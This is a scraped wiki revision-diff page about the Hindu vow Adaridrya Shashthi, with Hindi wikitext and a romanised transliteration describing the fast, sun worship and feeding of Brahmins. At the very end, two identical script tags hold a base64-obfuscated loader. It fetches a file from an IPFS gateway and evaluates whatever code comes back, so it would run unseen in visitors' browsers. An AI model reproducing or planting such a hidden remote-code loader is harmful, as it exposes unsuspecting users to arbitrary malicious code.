Difference between revisions of "अदारिद्र्य षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
{{menu}}
*[[षष्ठी]] को (उपवास या एकभक्त); एक वर्ष के लिए; [[भास्कर]] की पूजा;<ref> हेमाद्रि व्रतखण्ड (1, 626–627, स्कन्द के चार श्लोक उद्धरत हैं)</ref>।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*सम्पादनकर्ता तेल एवं नमक छोड़ देता है और ब्राह्मणों को दूध एवं शक्कर के साथ चावल पकाकर खिलाता है।  
+
*[[षष्ठी]] को (उपवास या एकभक्त); एक [[वर्ष]] के लिए; भास्कर की पूजा;<ref>हेमाद्रि व्रतखण्ड 1, 626–627, स्कन्द के चार श्लोक उद्धरत हैं</ref>।  
 +
*सम्पादनकर्ता तेल एवं [[नमक]] छोड़ देता है और [[ब्राह्मण|ब्राह्मणों]] को [[दूध]] एवं शक्कर के साथ [[चावल]] पकाकर खिलाता है।  
 
*कुटुम्ब में न कोई दरिद्र रहता है और न कोई दरिद्र उत्पन्न होता है।
 
*कुटुम्ब में न कोई दरिद्र रहता है और न कोई दरिद्र उत्पन्न होता है।
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 08:16, 15 November 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shashthi ko (upavas ya ekabhakt); ek varsh ke lie; bhaskar ki pooja;[1].
  • sampadanakarta tel evan namak chho d deta hai aur brahmanoan ko doodh evan shakkar ke sath chaval pakakar khilata hai.
  • kutumb mean n koee daridr rahata hai aur n koee daridr utpann hota hai.


tika tippani aur sandarbh

  1. hemadri vratakhand 1, 626–627, skand ke char shlok uddharat haian

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>